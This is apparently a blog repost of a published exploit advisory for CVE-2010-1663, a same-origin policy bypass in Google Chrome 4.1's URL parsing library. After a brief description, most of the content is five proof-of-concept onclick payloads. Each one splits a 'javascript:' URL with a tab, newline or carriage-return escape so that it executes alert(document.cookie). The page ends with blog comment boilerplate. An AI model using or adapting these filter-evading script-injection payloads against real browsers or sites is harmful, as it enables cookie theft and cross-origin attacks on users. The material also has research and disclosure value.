Exploit Code :
# Google Chrome 4.1.249.1059 Cross Origin Bypass in Google URL (GURL)
#
# CVE-ID: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1663
#
# Author: Jordi Chancel
#
# Software Link:
http://googlechromereleases.blogspot.com/2010/04/stable-update-bug-and-secu
rity-fixes.html
#
# Description: {
# The Google URL Parsing Library (aka google-url or GURL) in Google Chrome
# before 4.1.249.1064 allows remote attackers to bypass the Same Origin
Policy
# via CHARACTER TABULATION or others escape characters inside javascript:
protocol string. }
#
# Some PoC :
onclick="window.open('javascr\u0009ipt:alert(document.cookie)','test')"
>Inject JavaScript
----
onclick="window.open('javascr\x09ipt:alert(document.cookie)','test')"
>Inject JavaScript
----
onclick="window.open('javascr\nipt:alert(document.cookie)','test')" >Inject
JavaScript
----
onclick="window.open('javascr\ript:alert(document.cookie)','test')" >Inject
JavaScript
----
onclick="window.open('javascr\tipt:alert(document.cookie)','test')" >Inject
JavaScript
Greetz : Xylitol , Eddy Bordi , 599eme Man , Gnouf , CTZ .
Preference : http://securityreason.com/exploitalert/8270
Google Chrome 4.1.249.1059 Cross Origin Bypass in Google URL (GURL)
- Google Chrome 4.1.249.1059 Cross Origin Bypass in Google URL (GURL)
- Unknown
- May 20, 2010
- No comments:
Subscribe to:
Post Comments (Atom)
0 comments:
Post a Comment
silahkan tinggalkan komentar anda disini .. :D